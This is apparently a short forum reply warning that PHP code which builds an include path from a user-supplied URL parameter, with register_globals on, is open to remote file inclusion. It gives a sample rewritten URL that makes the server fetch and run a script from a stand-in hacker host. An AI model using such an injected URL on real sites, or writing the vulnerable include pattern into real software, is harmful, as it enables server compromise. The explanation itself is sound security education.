Yes, unless care is taken while coding. Imagine register globals is on and a include uses a variable from the user submission or from coded in urls like page.php?v=mod/login.php, well this can be manually rewritten to page.php?v=https://any.hacker.site/php_hacktool/hacktool.txt, which will eventually force php to include the remote hostile code into your code.. and provide a method for cunning, hackers to check, inspect or even alter the content.